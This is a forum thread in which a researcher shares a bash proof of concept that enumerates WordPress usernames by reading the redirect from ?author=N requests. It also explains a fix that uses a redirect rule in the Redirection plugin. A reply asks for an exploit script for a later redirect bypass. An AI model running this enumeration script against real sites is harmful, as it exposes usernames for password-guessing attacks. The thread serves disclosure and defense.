Results 1 to 2 of 2

Thread: wordpress username enumeration PoC bash Share/Save - My123World.Com!

  1. #1
    Security Researcher
    Join Date
    May 2011
    Location
    Pune, Maharashtra, India
    Posts
    237
    Blog Entries
    1

    wordpress username enumeration PoC bash

    Hi All,

    We have recently seen WordPress User name enumeration Vulnerability disclosure here http://seclists.org/fulldisclosure/2011/May/493

    Versions Effected are : 2.6, 3.1, 3.1.1, 3.1.3

    Ohk so lets see what this vulnerability is all about.

    Wordpress by default allows a simple redirection

    http://site_name/?author=1
    will redirect to
    http://site_name/author/user_name_author
    and this redirection is a 301 redirect.

    now you get the user page either userpage or a list of user posts.

    so we can extract the username from two places.
    1) title of html page -> need whole html to be loaded.
    2) redirect url. -> quick and easy.

    Here i am enclosing a simple PoC which could be run on Bash Shell.
    (Note : PoC on python is already available for those who are curious)

    Code:
    #!/bin/bash
    # WordPress User Enumeration PoC by Anant Shrivastava
    # Disclosure : http://seclists.org/fulldisclosure/2011/May/493
    if [ $# -ne 1 ]
    then
    echo "Wordpress username enumeration PoC"
    echo "based on disclosure @ : http://seclists.org/fulldisclosure/2011/May/493 "
    echo $0 "URL of Website"
    else
    count=1
    title=0
    while [ $count -lt 10 ]
    do
    result=`curl -I -s --max-time 30 --max-filesize 1 $1?author=$count | grep -F 'Location:'`
    name=`echo $result | rev | cut -f2 -d"/" | rev`
    nm=`echo "$"$result`
    if [ "$nm" != "$" ]
    then
    if [ $title == 0 ]
    then
    echo "ID : UserName"
    title=1
    fi
    echo -n $count " : "
    echo $name
    fi
    count=`expr $count + 1`
    done
    if [ $title == 0 ]
    then
    echo "Either this site is not vulnerable or is not using wordpress hosted"
    fi
    fi
    Originally Posted : http://blog.anantshri.info/wordpress...-shell-script/

    after creating the PoC my own site was also susceptible to this attack and hence i was looking for a fix and found a old friend of mine to the rescue.

    So here is the way how you can patch it

    I am right now using a wordpress plugin : Redirections
    https://wordpress.org/extend/plugins/redirection/

    Inside the plugin page which comes under : tools -> redirections

    Add a new rule with following settings.

    Source url : ^(.*)/?author=(.*)
    target url : /
    Reg Exp : Yes
    Match : url only
    Action : Redirect to url

    and Add Redirection

    all done… just try any url with ?author=no

    now this url will be redirected back to your main page effectively nullifying the effect of user name enumeration.

  2. #2

    Bash for Wordpress redirect.

    Could you please tell me how to write a bash or python script to implement the wordpress 4.5.2 redirect bypass vulnerability.
    Link : https://wpvulndb.com/vulnerabilities/8522


    Thank You.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •